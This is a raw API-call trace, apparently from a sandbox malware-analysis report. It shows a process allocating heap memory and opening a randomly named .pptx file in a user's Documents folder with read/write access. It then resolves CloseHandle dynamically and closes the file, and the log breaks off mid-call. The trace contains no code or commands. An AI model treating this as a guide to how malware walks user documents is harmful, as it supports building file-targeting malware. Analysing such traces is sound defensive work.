[0171.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0171.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0171.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0171.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0171.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0171.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x41) returned 0x9aa4f8 [0171.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx", cchWideChar=65, lpMultiByteStr=0x9aa4f8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx", lpUsedDefaultChar=0x0) returned 65 [0171.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0171.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0171.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.404] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kuxyygupccske_knyra.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0171.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0171.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0171.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0171.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0171.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0171.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0171.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0171.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0171.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0171.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x82) returned 0x8feba8 [0171.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=65, lpWideCharStr=0x8feba8, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx") returned 65 [0171.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0171.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0171.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0171.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0171.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0171.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0171.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0171.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0171.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0171.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0171.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0171.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0171.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0171.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0171.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0171.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0171.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0171.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0171.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0171.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0171.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0171.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0171.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0171.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0171.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0171.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.407] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0171.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0171.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0171.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.409] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0171.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0171.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0171.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0171.410] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0171.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0171.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0171.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0171.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.411] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0171.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0171.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0171.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0171.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.412] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0171.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0171.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0171.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba120, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0171.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.412] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0171.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0171.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0171.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0171.412] CloseHandle (hObject=0x120) returned 1 [0171.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0171.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0171.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0171.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0171.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0171.413] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, 